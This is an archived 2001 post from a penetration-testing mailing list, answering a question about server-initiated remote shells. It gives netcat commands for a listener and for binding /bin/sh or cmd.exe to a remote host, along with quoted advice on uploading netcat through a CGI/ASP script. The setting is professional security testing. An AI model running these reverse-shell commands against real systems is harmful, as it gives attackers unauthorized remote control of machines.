Penetration Testing mailing list archives
RE: Server initiated remote shell
From: Yonatan Bokovza <Yonatan () xpert com>
Date: Sun, 23 Sep 2001 20:36:30 +0300
-----Original Message----- From: Greg Ardpic [mailto:itb () rootshell be] Sent: Saturday, September 22, 2001 14:52 To: pen-test () securityfocus com Subject: Re: Server initiated remote shell On Fri, 21 Sep 2001, Bill Pennington wrote:You want netcat, you can find in on packetstorm. What you will need to do first is build an CGI/ASP scriptto upload yourcode, assuming you can't just tftp it from the internal system. Then on your box execute: nc -l -p 80 On the remote server execute nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or whatever command interpeter is handy. You will then see acommand promptappear on your local box. Sounds like the hard part will be getting netcat on thebox. Good luck!Does this works on unix machines? I have compiled netcat with -DGAPING_SECURITY_HOLE (so i could use the -e switch) but had no luck.
Trivially easy: On machine1 (windows in this case) nc -lp 1234 On machine2 (unix in this case) nc -e /bin/sh machine1 1234 That's really all there is to it. Machine1 could be unix too, with no change in the commands. Best Regards, Yonatan Bokovza IT Security Consultant Xpert Systems ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Server initiated remote shell Ilici Ramirez (Sep 21)
- RE: Server initiated remote shell Steve (Sep 21)
- Re: Server initiated remote shell Bill Pennington (Sep 21)
- Re: Server initiated remote shell Greg Ardpic (Sep 22)
- <Possible follow-ups>
- Re: Server initiated remote shell Mike Brentlinger (Sep 21)
- Re: Server initiated remote shell auto241065 (Sep 22)
- RE: Server initiated remote shell Yonatan Bokovza (Sep 23)
- RE: Server initiated remote shell Emmanuel Gadaix (Sep 24)